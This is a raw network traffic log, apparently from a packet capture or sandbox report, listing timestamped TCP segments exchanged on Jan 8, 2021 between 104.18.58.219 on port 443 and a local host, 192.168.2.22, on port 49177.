                                                        Jan 8, 2021 09:08:28.388659000 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.388689041 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.388699055 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.388760090 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.388767004 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.389514923 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.389559984 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.389647961 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.390584946 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.390628099 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.391223907 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.391679049 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.391719103 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.392761946 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.392806053 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.392942905 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.393857002 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.393908978 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.394011021 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.394961119 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.395009995 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.395234108 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.396002054 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.396040916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.397080898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.397120953 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.397182941 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.398269892 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.398310900 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.398416042 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.399286032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.399326086 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.399401903 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.617002010 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.617036104 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.617135048 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.617219925 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.617259979 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.617408991 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.617796898 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.617840052 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.617904902 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.618870020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.618911982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.619182110 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.620018005 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.620058060 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.620158911 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.621047020 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.621088982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.621496916 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.622169971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.622215986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.622282982 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.623239994 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.623291969 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.623357058 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.624330997 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.624373913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.624458075 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.625433922 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.625475883 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.625705957 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.626471996 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.626524925 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.626616955 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.627580881 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.627628088 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.627697945 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.628673077 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.628716946 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.628822088 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.629761934 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.629806042 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.629887104 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.630846977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.630903959 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.631128073 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.631964922 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.632005930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.632098913 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.633017063 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.633058071 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.633116007 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.634084940 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.634138107 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.634887934 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.635210991 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.635273933 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.635349035 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.636259079 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.636303902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.636384964 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.637350082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.637414932 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.637482882 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.638406992 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.638461113 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.639036894 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.639553070 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.639595985 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.639974117 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.640594959 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.640639067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.640852928 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.641707897 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.641750097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.642739058 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.663533926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.663580894 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.664628029 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.861696005 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.861725092 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.861799955 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.861843109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.861859083 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.862000942 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.862242937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.862267971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.862349987 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.862927914 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.862947941 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.862996101 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.863567114 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.863589048 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.863651037 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.864248991 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.864269018 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.864325047 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.864939928 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.864969015 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.865024090 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.865565062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.865797043 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.865849972 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.866245031 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.866272926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.866323948 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.866951942 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.866982937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.867034912 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.867599010 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.867625952 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.867706060 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.868220091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.868243933 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.868319988 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.868926048 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.868952036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.869019985 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.869621038 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.869652987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.869719028 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.870234966 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.870259047 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.870321035 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.870871067 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.870889902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.870953083 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.871527910 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.871557951 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.871613026 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.872226954 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.872255087 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.872314930 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.872904062 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.872931957 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.872992039 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.873579025 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.873605967 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.873687983 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.874202013 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.874233961 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.874295950 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.874842882 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.874871969 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.874994040 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.875575066 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.875596046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.875663996 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.876199961 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.876219988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.876281977 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.876841068 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.876859903 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:28.876936913 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:28.908121109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.057967901 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.057996988 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058195114 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.058231115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058255911 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058331966 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.058655977 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058677912 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.058882952 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.059303045 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.059329987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.059386969 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.060055971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.060082912 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.060129881 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.060668945 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.060689926 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.060733080 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.061331987 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.061362028 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.061412096 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.061988115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.062015057 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.062068939 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.062731981 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.062752008 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.062823057 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.063267946 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.063292980 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.063354015 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.063924074 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.063947916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.064002991 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.064594984 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.064615011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.064667940 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.065367937 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.065433979 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.065488100 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.065931082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.065957069 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.066005945 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.066584110 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.066613913 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.066669941 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.067257881 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.067286015 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.067343950 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.067904949 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.067934036 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.067986012 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.068577051 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.068598032 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.068644047 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.069233894 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.069263935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.069314003 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.069894075 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.069922924 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.069993019 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.070588112 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.070610046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.070661068 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.071230888 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.071300030 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.071362019 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.072166920 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.072196007 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.072277069 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.072559118 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.072578907 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.072632074 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.073427916 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.073448896 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.073533058 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.073868990 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.073893070 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.073946953 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.074611902 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.074661016 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.074738979 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.075261116 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.075306892 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.075386047 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.075947046 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.075992107 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.076069117 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.076601028 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.076682091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.076803923 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.077212095 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.077255011 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.077337980 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.077883959 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.077924967 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.078031063 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.078568935 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.078649044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.078739882 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.079193115 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.079246044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.079339981 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.079910040 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.079952955 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.080096006 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.080573082 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.080615044 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.080681086 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.081207037 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.081247091 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.081325054 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.081849098 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.293076038 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.306298971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.306349993 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.306382895 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.306421995 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.306428909 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.306474924 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.306960106 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.307008982 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.307065964 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.307617903 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.307667971 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.307837963 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.308341980 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.308392048 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.308451891 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.309034109 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.309087038 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.309164047 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.309663057 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.309721947 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.309789896 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.310286045 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.310328960 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.310385942 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.310956001 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.311008930 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.311063051 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.311630964 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.311681986 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.311800003 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.312292099 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.312328100 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.312381029 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.312984943 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.313028097 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.313091993 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.313612938 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.313647985 CET44349177104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:29.313709974 CET49177443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:29.314268112 CET44349177104.18.58.219192.168.2.22
